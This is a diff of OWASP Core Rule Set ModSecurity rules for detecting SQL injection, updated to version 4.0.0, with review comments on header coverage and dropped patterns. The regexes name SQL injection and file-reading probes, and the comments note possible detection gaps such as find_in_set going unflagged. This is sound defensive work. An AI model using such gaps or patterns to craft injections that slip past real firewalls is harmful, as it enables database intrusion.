+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942180 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:/\*)+[\"'`]+[\s\v]?(?:--|[#\{]|/\*)?|[\"'`](?:[\s\v]*(?:(?:x?or|and|div|like|between)[\s\v\-0-9A-Z_a-z]+[\(-\)\+-\-<->][\s\v]*[\"'0-9`]|[!=\|](?:[\s\v -!\+\-0-9=]+.*?[\"'-\(`].*?|[\s\v -!0-9=]+.*?[0-9]+)$|(?:like|print)[^0-9A-Z_a-z]+[\"'-\(0-9A-Z_-z]|;)|(?:[<>~]+|[\s\v]*[^\s\v0-9A-Z_a-z]?=[\s\v]*|[^0-9A-Z_a-z]*?[\+=]+[^0-9A-Z_a-z]*?)[\"'`])|[0-9][\"'`][\s\v]+[\"'`][\s\v]+[0-9]|^admin[\s\v]*?[\"'`]|[\s\v\"'-\(`][\s\v]*?glob[^0-9A-Z_a-z]+[\"'-\(0-9A-Z_-z]|[\s\v]is[\s\v]*?0[^0-9A-Z_a-z]|where[\s\v][\s\v,-\.0-9A-Z_a-z]+[\s\v]=" \ "id:942180,\ phase:2,\ block,\ 
@@ -651,23 +815,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942200.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942200.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942200.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942200 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\s*?\(\s*?space\s*?\(|,.*?[)\da-f\"'`][\"'`](?:[\"'`].*?[\"'`]|(?:\r?\n)?\z|[^\"'`]+)|\Wselect.+\W*?from))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i),.*?[\"'\)0-9`-f][\"'`](?:[\"'`].*?[\"'`]|(?:\r?\n)?\z|[^\"'`]+)|[^0-9A-Z_a-z]select.+[^0-9A-Z_a-z]*?from|(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)[\s\v]*?\([\s\v]*?space[\s\v]*?\(" \ "id:942200,\ phase:2,\ block,\ 
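Review bot: 942200 now also inspects `REQUEST_HEADERS:User-Agent` and `REQUEST_HEADERS:Referer`, but none of the other rules visible in this diff do and the comment above the rule gives no rationale; a Referer that is a search URL such as `...?q=select+from+users` matches the `[^0-9A-Z_a-z]select.+[^0-9A-Z_a-z]*?from` alternative and adds a critical score at PL2 (the rule's transformation line is outside the hunk, so whether the header is decoded first cannot be checked here). A comment above the rule naming why these two headers were added, plus a regression test with such a Referer, would make the false-positive trade-off explicit.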
@@ -683,23 +844,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942210.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942210.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942210.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942210 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]|\d(?:\s*?(?:between|like|x?or|and|div)\s*?\d+\s*?[\-+]|\s+group\s+by.+\()|\/\w+;?\s+(?:between|having|select|like|x?or|and|div)\W|--\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|#\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|;\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|\@.+=\s*?\(\s*?select|[^\w]SET\s*?\@\w+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:&&|\|\||and|between|div|like|n(?:and|ot)|(?:xx?)?or)[\s\v\(]+[0-9A-Z_a-z]+[\s\v\)]*?[!\+=]+[\s\v0-9]*?[\"'-\)=`]|[0-9](?:[\s\v]*?(?:and|between|div|like|x?or)[\s\v]*?[0-9]+[\s\v]*?[\+\-]|[\s\v]+group[\s\v]+by.+\()|/[0-9A-Z_a-z]+;?[\s\v]+(?:and|between|div|having|like|x?or|select)[^0-9A-Z_a-z]|(?:[#;]|--)[\s\v]*?(?:alter|drop|(?:insert|update)[\s\v]*?[0-9A-Z_a-z]{2,})|@.+=[\s\v]*?\([\s\v]*?select|[^0-9A-Z_a-z]SET[\s\v]*?@[0-9A-Z_a-z]+" \ "id:942210,\ phase:2,\ block,\ 
@@ -715,20 +873,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942260.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble-v2.pl regexp-942260.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# ASSEMBLE_OUTPUT | s/^(?:/(?i:/ +# Regular expression generated from regex-assembly/942260.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942260 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`]\s*?(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||and|div|&&)\s+[\s\w]+=\s*?\w+\s*?having\s+|like(?:\s+[\s\w]+=\s*?\w+\s*?having\s+|\W*?[\"'`\d])|[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w|\*\s*?\w+\W+[\"'`])|(?:union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select|select\s+?[\[\]()\s\w\.,\"'`-]+from)\s+|\w\s+like\s+[\"'`]|find_in_set\s*?\(|like\s*?[\"'`]%)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`][\s\v]*?(?:(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|\|\||&&)[\s\v]+[\s\v0-9A-Z_a-z]+=[\s\v]*?[0-9A-Z_a-z]+[\s\v]*?having[\s\v]+|like[^0-9A-Z_a-z]*?[\"'0-9`])|[0-9A-Z_a-z][\s\v]+like[\s\v]+[\"'`]|like[\s\v]*?[\"'`]%|select[\s\v]+?[\s\v\"'-\),-\.0-9A-\[\]_-z]+from[\s\v]+" \ "id:942260,\ phase:2,\ block,\ 
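Review bot: The regenerated 942260 drops three alternatives the old pattern had — the `union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select` form, `find_in_set\s*?\(`, and the possessive `[^?\w\s=.,;)(]++…` probe — without a comment saying where the coverage went. `union … select` does appear in 942360's `nion[\s\v]*(?:all|(?:sele|distin)ct)` at PL1 in this file, but `find_in_set(` is also removed from 942150's list in this diff, so unless a rule outside this chunk matches it the function is now unflagged. A one-line note above the rule such as `# union/select and find_in_set coverage moved to rule <id>` (with the real id filled in) would make the removal auditable.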
@@ -744,20 +899,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942300.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942300.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942300.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942300 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)\s+\s*?\w+\(|\)\s*?when\s*?\d+\s*?then|[\"'`]\s*?(?:--|\{|#)|cha?r\s*?\(\s*?\d|\/\*!\s?\d+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\)[\s\v]*?when[\s\v]*?[0-9]+[\s\v]*?then|[\"'`][\s\v]*?(?:[#\{]|--)|/\*![\s\v]?[0-9]+|\b(?:(?:binary|cha?r)[\s\v]*?\([\s\v]*?[0-9]|(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|r(?:egexp|like))[\s\v]+[0-9A-Z_a-z]+\()|(?:\|\||&&)[\s\v]*?[0-9A-Z_a-z]+\(" \ "id:942300,\ phase:2,\ block,\ 
@@ -773,20 +925,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942310.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942310.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942310.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942310 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:[\"'`](?:;\s*?(?:begin|while|if)|[\s\d]+=\s*?\d|\s+and\s*?=\W)|(?:\(\s*?select\s*?\w+|order\s+by\s+if\w*?|coalesce)\s*?\(|\w[\"'`]\s*?(?:(?:[-+=|@]+\s+?)+|[-+=|@]+)[\d(]|[\s(]+case\d*?\W.+[tw]hen[\s(]|\+\s*?\d+\s*?\+\s*?\@|\@\@\w+\s*?[^\w\s]|\W!+[\"'`]\w|\*\/from))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\([\s\v]*?select[\s\v]*?[0-9A-Z_a-z]+|coalesce|order[\s\v]+by[\s\v]+if[0-9A-Z_a-z]*?)[\s\v]*?\(|\*/from|\+[\s\v]*?[0-9]+[\s\v]*?\+[\s\v]*?@|[0-9A-Z_a-z][\"'`][\s\v]*?(?:(?:[\+\-=@\|]+[\s\v]+?)+|[\+\-=@\|]+)[\(0-9]|@@[0-9A-Z_a-z]+[\s\v]*?[^\s\v0-9A-Z_a-z]|[^0-9A-Z_a-z]!+[\"'`][0-9A-Z_a-z]|[\"'`](?:;[\s\v]*?(?:if|while|begin)|[\s\v0-9]+=[\s\v]*?[0-9])|[\s\v\(]+case[0-9]*?[^0-9A-Z_a-z].+[tw]hen[\s\v\(]" \ "id:942310,\ phase:2,\ block,\ 
@@ -802,10 +951,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ SQL Injection Probings ]=- 
@@ -815,15 +964,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # 942330 PL 2 # 942370 PL 2 # 942490 PL 3 -# Regexp generated from util/regexp-assemble/regexp-942330.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942330.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:^(?:[\"'`\\\\]*?(?:[^\"'`]+[\"'`]|[\d\"'`]+)\s*?(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)\s*?[\w\"'`][+&!@(),.-]|.?[\"'`]$)|\@(?:[\w-]+\s(?:between|like|x?or|and|div)\s*?[^\w\s]|\w+\s+(?:between|like|x?or|and|div)\s*?[\"'`\d]+)|[\"'`]\s*?(?:between|like|x?or|and|div)\s*?[\"'`]?\d|[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`].|[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w|\Winformation_schema|\\\\x(?:23|27|3d)|table_name\W))" \ +# Regular expression generated from regex-assembly/942330.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942330 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`][\s\v]*?\b(?:x?or|div|like|between|and)\b[\s\v]*?[\"'`]?[0-9]|\x5cx(?:2[37]|3d)|^(?:.?[\"'`]$|[\"'\x5c`]*?(?:[\"'0-9`]+|[^\"'`]+[\"'`])[\s\v]*?\b(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|\|\||&&)\b[\s\v]*?[\"'0-9A-Z_-z][!&\(-\)\+-\.@])|[^\s\v0-9A-Z_a-z][0-9A-Z_a-z]+[\s\v]*?[\-\|][\s\v]*?[\"'`][\s\v]*?[0-9A-Z_a-z]|@(?:[0-9A-Z_a-z]+[\s\v]+(?:and|x?or|div|like|between)\b[\s\v]*?[\"'0-9`]+|[\-0-9A-Z_a-z]+[\s\v](?:and|x?or|div|like|between)\b[\s\v]*?[^\s\v0-9A-Z_a-z])|[^\s\v0-:A-Z_a-z][\s\v]*?[0-9][^0-9A-Z_a-z]+[^\s\v0-9A-Z_a-z][\s\v]*?[\"'`].|[^0-9A-Z_a-z]information_schema|table_name[^0-9A-Z_a-z]" \ "id:942330,\ phase:2,\ block,\ 
@@ -839,22 +985,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" - -# Regexp generated from util/regexp-assemble/regexp-942340.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942340.data -# Note that part of regexp-942340.data is already optimized, to avoid a -# Regexp::Assemble behaviour, where the regex is not optimized very nicely. -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:[\"'`](?:\s*?(?:is\s*?(?:[\d.]+\s*?\W.*?[\"'`]|\d.+[\"'`]?\w)|\d\s*?(?:--|#))|(?:\W+[\w+-]+\s*?=\s*?\d\W+|\|?[\w-]{3,}[^\w\s.,]+)[\"'`]|[\%&<>^=]+\d\s*?(?:between|like|x?or|and|div|=))|(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+(?:sounds\s+like\s*?[\"'`]|regexp\s*?\(|[=\d]+x)|in\s*?\(+\s*?select))" \ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/942340.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942340 +# +# Note that part of 942340.data is already optimized, to avoid a +# Regexp::Assemble behaviour, where the regex is not optimized very nicely. 
+# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)in[\s\v]*?\(+[\s\v]*?select|(?:(?:(?i:N)?AND|(?i:X)?(?i:X)?OR|DIV|LIKE|BETWEEN|NOT)[\s\v]+|(?:\|\||&&)[\s\v]*)[\s\v\+0-9A-Z_a-z]+(?:regexp[\s\v]*?\(|sounds[\s\v]+like[\s\v]*?[\"'`]|[0-9=]+x)|[\"'`](?:[\s\v]*?(?:[0-9][\s\v]*?(?:--|#)|is[\s\v]*?(?:[0-9].+[\"'`]?[0-9A-Z_a-z]|[\.0-9]+[\s\v]*?[^0-9A-Z_a-z].*?[\"'`]))|[%-&<->\^]+[0-9][\s\v]*?(?:=|x?or|div|like|between|and)|(?:[^0-9A-Z_a-z]+[\+\-0-9A-Z_a-z]+[\s\v]*?=[\s\v]*?[0-9][^0-9A-Z_a-z]+|\|?[\-0-9A-Z_a-z]{3,}[^\s\v,\.0-9A-Z_a-z]+)[\"'`]|[\s\v]*(?:(?:(?i:N)?AND|(?i:X)?(?i:X)?OR|DIV|LIKE|BETWEEN|NOT)[\s\v]+|(?:\|\||&&)[\s\v]*)(?:array[\s\v]*\[|[0-9A-Z_a-z]+(?:[\s\v]*!?~|[\s\v]+(?:not[\s\v]+)?similar[\s\v]+to[\s\v]+)|(?:tru|fals)e\b))|\bexcept[\s\v]+(?:select\b|values[\s\v]*?\()" \ "id:942340,\ phase:2,\ block,\ @@ -870,10 +1014,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # This rule is a stricter sibling of 942360. # The keywords 'alter' and 'union' led to false positives. 
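Review bot: The retained note `# Note that part of 942340.data is already optimized, to avoid a Regexp::Assemble behaviour ...` now contradicts the lines directly above it, which say the expression comes from `regex-assembly/942340.ra` via `crs-toolchain`; a reader cannot tell whether the hand-optimisation caveat still applies to the new toolchain or refers to a file that no longer exists. Either drop the two lines or reword them, e.g. `# Note: parts of 942340.ra are hand-assembled because automatic assembly produced a poorly optimised expression for them.` The comment should also say that this is not a pure regeneration: the new expression adds `\bexcept[\s\v]+(?:select\b|values[\s\v]*?\()` and the `array[` / `similar to` / `!?~` branches, which is a detection change that the "regenerated" wording hides.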
@@ -895,25 +1039,53 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This rule is a stricter sibling of 942360. +# The loose word boundaries and light context led to false positives. +# Because the stricter variant does miss quite a few legitimate payloads, the loose version was moved to PL2. +# +# Regular expression generated from regex-assembly/942362.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942362 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:alter|(?:(?:cre|trunc|upd)at|renam)e|de(?:lete|sc)|(?:inser|selec)t|load)[\s\v]+(?:char|group_concat|load_file)[\s\v]?\(?|end[\s\v]*?\);|[\s\v\(]load_file[\s\v]*?\(|[\"'`][\s\v]+regexp[^0-9A-Z_a-z]|[^A-Z_a-z][\s\v]+as\b[\s\v]*[\"'0-9A-Z_-z]+[\s\v]*\bfrom|^[^A-Z_a-z]+[\s\v]*?(?:create[\s\v]+[0-9A-Z_a-z]+|(?:d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load|(?:renam|truncat)e|u(?:pdate|nion[\s\v]*(?:all|(?:sele|distin)ct))|alter[\s\v]*(?:a(?:(?:ggregat|pplication[\s\v]*rol)e|s(?:sembl|ymmetric[\s\v]*ke)y|u(?:dit|thorization)|vailability[\s\v]*group)|b(?:roker[\s\v]*priority|ufferpool)|c(?:ertificate|luster|o(?:l(?:latio|um)|nversio)n|r(?:edential|yptographic[\s\v]*provider))|d(?:atabase|efault|i(?:mension|skgroup)|omain)|e(?:(?:ndpoi|ve)nt|xte(?:nsion|rnal))|f(?:lashback|oreign|u(?:lltext|nction))|hi(?:erarchy|stogram)|group|in(?:dex(?:type)?|memory|stance)|java|l(?:a(?:ngua|r)ge|ibrary|o(?:ckdown|g(?:file[\s\v]*group|in)))|m(?:a(?:s(?:k|ter[\s\v]*key)|terialized)|e(?:ssage[\s\v]*type|thod)|odule)|(?:nicknam|q
ueu)e|o(?:perator|utline)|p(?:a(?:ckage|rtition)|ermission|ro(?:cedur|fil)e)|r(?:e(?:mot|sourc)e|o(?:l(?:e|lback)|ute))|s(?:chema|e(?:arch|curity|rv(?:er|ice)|quence|ssion)|y(?:mmetric[\s\v]*key|nonym)|togroup)|t(?:able(?:space)?|ext|hreshold|r(?:igger|usted)|ype)|us(?:age|er)|view|w(?:ork(?:load)?|rapper)|x(?:ml[\s\v]*schema|srobject)))\b)" \ + "id:942362,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects concatenated basic SQL injection and SQLLFI attempts',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + # This rule is a sibling of 942330. See that rule for a description and overview. # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942370.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942370.data -# Note that after assemble an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942370.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942370 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`](?:\s*?(?:(?:\*.+(?:(?:an|i)d|between|like|x?or|div)\W*?[\"'`]|(?:between|like|x?or|and|div)\s[^\d]+[\w-]+.*?)\d|[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`]|[^\w\s]+\s*?[\W\d].*?(?:--|#))|.*?\*\s*?\d)|[()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,]|\^[\"'`])" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`](?:[\s\v]*?(?:(?:\*.+(?:x?or|div|like|between|(?:an|i)d)[^0-9A-Z_a-z]*?[\"'`]|(?:x?or|div|like|between|and)[\s\v][^0-9]+[\-0-9A-Z_a-z]+.*?)[0-9]|[^\s\v0-9\?A-Z_a-z]+[\s\v]*?[^\s\v0-9A-Z_a-z]+[\s\v]*?[\"'`]|[^\s\v0-9A-Z_a-z]+[\s\v]*?[^A-Z_a-z].*?(?:#|--))|.*?\*[\s\v]*?[0-9])|\^[\"'`]|[%\(-\+\-<>][\-0-9A-Z_a-z]+[^\s\v0-9A-Z_a-z]+[\"'`][^,]" \ "id:942370,\ phase:2,\ block,\ 
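Review bot: 942370 now also inspects `REQUEST_HEADERS:Referer` and `REQUEST_HEADERS:User-Agent`, but its comment still only says "This rule is a sibling of 942330", and 942330 itself (earlier in this diff) keeps the old target list, so the two siblings no longer cover the same input and nothing records why. Add a line such as `# Referer and User-Agent are inspected here as well; 942330 intentionally does not cover them (see <issue/PR>).` so the asymmetry is not later "aligned" in either direction by accident. In the new 942362 header, `does miss quite a few legitimate payloads` is ambiguous — if it means real attack payloads the tightened PL1 942360 no longer catches, say `misses a number of real attack payloads`; and `tag:'paranoia-level/2'` sits before `tag:'OWASP_CRS'` there, unlike every other rule in the file. 942370's remaining actions are outside the hunk.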
